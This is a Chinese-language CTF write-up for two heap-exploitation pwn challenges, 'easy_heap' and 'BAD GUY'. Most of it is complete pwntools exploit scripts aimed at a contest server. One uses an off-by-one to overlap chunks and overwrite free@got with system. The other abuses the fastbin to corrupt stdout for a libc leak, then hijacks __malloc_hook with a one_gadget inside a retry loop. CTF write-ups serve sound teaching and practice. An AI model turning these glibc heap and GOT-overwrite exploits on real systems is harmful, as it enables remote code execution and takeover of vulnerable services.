題目質量很高萌新直接自閉
這 2 道題都挺基礎的
easy_heap
exp:
off-by-one 覆寫了相鄰 chunk 的 size 欄位，造成 chunk 重疊；藉此偽造 note 的資料指標（推測程式以 {size, ptr} 結構保存 note），取得任意地址讀（show 洩漏 free@got）與任意地址寫（edit 改寫 GOT 為 system）。
#!/usr/bin/python2
from pwn import *
p=0  # global tube placeholder; pwn() replaces it with the remote/process handle
def pwn():
    """Exploit for easy_heap: off-by-one on a chunk size -> overlapping chunks -> GOT overwrite.

    Connects to the remote service (the local ``process`` line is left commented
    out), leaks the libc address of ``free`` through a forged note pointer, and
    swaps ``free@got`` for ``system`` so that freeing the ``/bin/sh`` note pops a
    shell.  Everything happens over the tube; nothing is returned.
    """
    global p
    #p=process('./pwn')
    p=remote('ha1cyon-ctf.fun',30179)
    elf=ELF('./pwn')
    # NOTE(review): this is the *local* libc, not the target's.  The symbol
    # offsets used below (free, system) are only correct if the remote runs the
    # same build -- confirm, or point ELF() at the libc shipped with the task.
    libc=elf.libc
    sla=lambda data,data1:p.sendlineafter('%s'%(data),data1)
    sda=lambda data,data1:p.sendafter('%s'%(data),data1)
    # Menu wrappers; prompts are matched on their trailing ' :' / ': ' fragments only.
    def add(size,data):
        sla(' :','1')
        sla(' : ',str(size))
        sla(':',data)
    def edit(idx,data):
        sla(' :','2')
        sla(' :',str(idx))
        sda(': ',data)
    def show(idx):
        sla(' :','3')
        sla(' :',str(idx))
    def delete(idx):
        sla(' :','4')
        sla(' :',str(idx))
    # Three notes of 0x18 bytes each; note 2 holds the argument for the final system().
    add(0x18,'\x02'*2)#0
    add(0x18,'\x03'*3)#1
    add(0x18,'/bin/sh\x00')#2
    # Off-by-one: the 0x19th byte lands on the next chunk's size field, growing it
    # (presumably from 0x21) to 0x41 so that it now spans its neighbour as well.
    edit(0,'a'*0x18+'\x41')
    # Free the oversized chunk; it is filed in the 0x40 bin (tcache or fastbin,
    # depending on the target glibc).
    delete(1)
    # Take the 0x40 chunk back and lay out a fake 0x21 chunk header followed by
    # {0x100, &free@got}.  Presumably the program keeps a per-note {size, ptr}
    # record (TODO confirm from the binary): the forged record makes note 1's
    # data pointer reference the GOT, giving an arbitrary read/write primitive.
    # Writing the GOT also implies the binary is not Full RELRO (check with checksec).
    payload='a'*0x10+p64(0)+p64(0x21)+p64(0x100)+p64(elf.got['free'])
    add(0x38,payload)
    # Arbitrary read: dump free@got -> libc address of free.
    show(1)
    # Scan for the 0x7f byte of a userland libc pointer; fragile if the output
    # contains no such byte (recvuntil then blocks until the tube closes).
    libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['free']
    system=libcbase+libc.sym['system']
    # Arbitrary write: free@got = system.
    edit(1,p64(system))
    # free(note 2) is now system("/bin/sh").
    delete(2)
    p.interactive()
if __name__ == "__main__":
    # Run the exploit once; there is no retry loop here, so any tube error
    # (EOF, timeout) propagates and terminates the script.
    pwn()
BAD GUY
先用堆溢出把 fastbin 的 fd 低兩位元組部分覆寫成 0x25dd（由此推斷指向 _IO_2_1_stdout_ 附近的偽 chunk），再改寫 stdout 的 _flags（0xfbad3c80）與 _IO_write_base 低位元組洩漏 libc 地址；fd 第二位元組的高 4 bit 受 ASLR 影響，因此需要多次重試。拿到 libc 地址後就是常規的 fastbin attack：把 __malloc_hook 改成 realloc+9、__realloc_hook 改成 one_gadget，再觸發一次 malloc 拿 shell。
exp:
from pwn import *
p=0  # global tube placeholder; pwn() replaces it with the remote/process handle
def pwn(ip,port,debug):
    """Exploit for BAD GUY: heap overflow -> fastbin attack on stdout for a libc
    leak, then a second fastbin attack on __malloc_hook/__realloc_hook.

    Args:
        ip, port: target address, used when ``debug`` is not 1.
        debug: 1 runs ``./pwn1`` locally instead of connecting.

    Returns:
        True once the interactive session ends.  Any failure surfaces as an
        exception (EOF, recv timeout, ...) and the caller retries, because the
        stdout leak depends on a partial pointer overwrite that guesses 4 ASLR
        bits (presumably ~1 in 16 attempts succeeds).
    """
    global p
    if debug==1:
        p=process('./pwn1')
        elf=ELF('./pwn1')
        libc=elf.libc
    else:
        p=remote(ip,port)
        elf=ELF('./pwn1')
        # NOTE(review): local libc, not the target's -- the __malloc_hook and
        # __libc_realloc offsets below are only right if both builds match.
        libc=elf.libc
    sla=lambda data,data1:p.sendlineafter('%s'%(data),data1)
    sda=lambda data,data1:p.sendafter('%s'%(data),data1)
    # Menu wrappers.  ``edit`` takes its own length, so it can write past a
    # note's allocation -- that is the heap overflow the whole exploit relies on.
    def add(idx,size,data):
        sla('>> ','1')
        sla(' :',str(idx))
        sla(': ',str(size))
        sda(':',data)
    def edit(idx,size,data):
        sla('>> ','2')
        sla(' :',str(idx))
        sla(': ',str(size))
        sda(': ',data)
    def delete(idx):
        sla('>> ','3')
        sla(' :',str(idx))
    # Heap layout: 0x20 | 0x30 | 0x70 | 0x20 | 0x70 | 0x30 chunks for requests of
    # 0x18/0x28/0x68 (presumably a glibc without tcache, i.e. <= 2.25).
    add(0,0x18,'\x02'*2)
    add(1,0x28,'\x03'*3)
    add(2,0x68,'\x04'*4)
    add(3,0x18,'\x05'*5)
    add(4,0x68,'\x06'*6)
    add(5,0x28,'\x07'*7)
    # Overflow from note 0 into note 1's size field: presumably 0x31 -> 0xa1
    # (0x30 + 0x70 | PREV_INUSE), so chunk 1 now covers chunk 2 as well.
    payload='a'*0x18+p64(0xa1)
    edit(0,len(payload),payload)
    # free(1): a 0xa0 chunk is above the fastbin limit and presumably goes to the
    # unsorted bin; free(2): chunk 2 goes to the 0x70 fastbin.  Both lists now
    # touch chunk 2's memory.
    delete(1)
    delete(2)
    # Re-request 0x28: carved from the 0xa0 chunk, leaving a 0x70 remainder at
    # chunk 2 whose fd/bk are now libc (main_arena) pointers.
    add(1,0x28,'\x08'*8)
    # Overflow again: rebuild chunk 2's header (size 0x71) and overwrite the low
    # two bytes of its fastbin fd with 0x25dd.  Presumably that points at a fake
    # chunk just below _IO_2_1_stdout_ (stdout - 0x43) whose "size" byte is the
    # 0x7f of a stored pointer; the upper nibble of the second byte is ASLR, so
    # the guess is right only ~1/16 of the time -- hence the retry loop in __main__.
    payload='a'*0x20+p64(0)+p64(0x71)+'\xdd\x25'
    edit(1,len(payload),payload)
    # First 0x70 request returns chunk 2, the second returns the fake chunk
    # inside the stdout FILE struct.
    add(6,0x68,'dd')
    # 0x33 bytes of padding reach _flags; then _flags = 0xfbad3c80,
    # _IO_read_ptr/_IO_read_end/_IO_read_base = 0 and the low byte of
    # _IO_write_base = 0, so the next stdout flush dumps the bytes in front of the
    # write buffer -- a libc pointer among them.
    add(7,0x68,'\x00'*0x33+p64(0xfbad3c80)+3*p64(0)+p8(0))
    # 3954176 == 0x3c5600: offset of whichever libc pointer recvuntil lands on
    # first.  Hard-coded for one libc build (looks like glibc 2.23 / Ubuntu 16.04
    # -- confirm); on any other build libcbase is silently wrong.
    libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-3954176
    # one_gadget candidates for that same build; index 1 is the one used.  They
    # are not derived from ``libc`` either, so keep them in sync with the offset above.
    o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
    one_gadget=libcbase+o_g[1]
    malloc_hook=libcbase+libc.sym['__malloc_hook']
    realloc=libcbase+libc.sym['__libc_realloc']
    # Second fastbin attack: free chunk 4 (0x70), then overflow from note 3 to
    # keep its size 0x71 and point its fd at __malloc_hook-0x23 (presumably
    # another fake chunk whose size byte is 0x7f).
    delete(4)
    payload='a'*0x18+p64(0x71)+p64(malloc_hook-0x23)
    edit(3,len(payload),payload)
    log.success('libcbase: '+hex(libcbase))
    # First 0x70 request returns chunk 4, the second the fake chunk.  Its user
    # data starts at __malloc_hook-0x13: 11 bytes of padding, then
    # __realloc_hook = one_gadget and __malloc_hook = realloc+9.  Entering realloc
    # past its first pushes presumably re-aligns the stack so the one_gadget's
    # register/stack constraints hold where a direct hook did not.
    add(2,0x68,'dodou')
    add(8,0x68,'a'*11+p64(one_gadget)+p64(realloc+9))
    # Any further malloc fires the hook chain: option 1, idx 10, size 2.
    sla('>> ','1')
    sla(' :',str(10))
    sla(': ',str(2))
    p.interactive()
    return True
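if __name__ == '__main__':
    # The stdout leak relies on a partial pointer overwrite, so most attempts
    # fail with EOF/timeout; keep retrying until pwn() reports success.
    # (Ctrl-C is KeyboardInterrupt, not Exception, so it still stops the loop.)
    while 1:
        try:
            if pwn('ha1cyon-ctf.fun', 30215, 0):
                break
        except Exception as e:
            # Log instead of silently discarding the failure, and only close p
            # if it actually is a tube: when remote() itself fails, p is still
            # the int placeholder and the original unconditional p.close()
            # raised AttributeError, killing the retry loop.
            log.warning('attempt failed: %r' % (e,))
            if hasattr(p, 'close'):
                p.close()
            continue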